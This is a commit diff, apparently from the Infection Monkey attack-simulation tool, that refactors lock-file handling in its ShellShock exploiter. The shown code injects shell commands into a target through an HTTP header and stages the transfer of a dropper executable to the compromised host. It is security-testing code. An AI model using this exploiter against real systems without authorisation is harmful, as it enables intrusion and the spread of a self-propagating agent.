This commit is contained in:
Anh T Nguyen 2019-09-07 07:14:11 +07:00
parent ee10ca9050
commit 7b0bf71279
2 changed files with 11 additions and 28 deletions

View File

@ -76,16 +76,6 @@ class HostExploiter(object):
powershell = True if "powershell" in cmd.lower() else False powershell = True if "powershell" in cmd.lower() else False
self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell}) self.exploit_info['executed_cmds'].append({'cmd': cmd, 'powershell': powershell})
def _try_lock(self, create_file_fn, path):
"""
Create temporary file on target machine to avoid collision of long-running exploiters
:return: True if no other monkey is running same exploit
"""
return create_file_fn(path)
def _exit_lock(self, remove_file_fn, path):
remove_file_fn(path)
from infection_monkey.exploit.win_ms08_067 import Ms08_067_Exploiter from infection_monkey.exploit.win_ms08_067 import Ms08_067_Exploiter
from infection_monkey.exploit.wmiexec import WmiExploiter from infection_monkey.exploit.wmiexec import WmiExploiter

View File

@ -109,9 +109,8 @@ class ShellShockExploiter(HostExploiter):
LOG.info("Can't find suitable monkey executable for host %r", self.host) LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False return False
if not self._try_lock(create_file_fn=self._create_lock_file(exploit, url, header), if not self._create_lock_file(exploit, url, header):
path=LOCK_HELPER_FILE): LOG.info("Another monkey is running shellshock exploit")
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True return True
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
@ -130,8 +129,7 @@ class ShellShockExploiter(HostExploiter):
http_thread.join(DOWNLOAD_TIMEOUT) http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop() http_thread.stop()
self._exit_lock(remove_file_fn=self._remove_lock_file(exploit, url, header), self._remove_lock_file(exploit, url, header)
path=LOCK_HELPER_FILE)
if (http_thread.downloads != 1) or ( if (http_thread.downloads != 1) or (
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
@ -192,20 +190,15 @@ class ShellShockExploiter(HostExploiter):
return False, return False,
def _create_lock_file(self, exploit, url, header): def _create_lock_file(self, exploit, url, header):
def f(filepath): if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
if self.check_remote_file_exists(url, header, exploit, filepath): return False
LOG.info("Another monkey is running shellshock exploit") cmd = exploit + 'echo AAAA > %s' % LOCK_HELPER_FILE
return False self.attack_page(url, header, cmd)
cmd = exploit + 'echo AAAA > %s' % filepath return True
self.attack_page(url, header, cmd)
return True
return f
def _remove_lock_file(self, exploit, url, header): def _remove_lock_file(self, exploit, url, header):
def f(filepath): cmd = exploit + 'rm %s' % LOCK_HELPER_FILE
cmd = exploit + 'rm %s' % filepath self.attack_page(url, header, cmd)
self.attack_page(url, header, cmd)
return f
@staticmethod @staticmethod
def attack_page(url, header, attack): def attack_page(url, header, attack):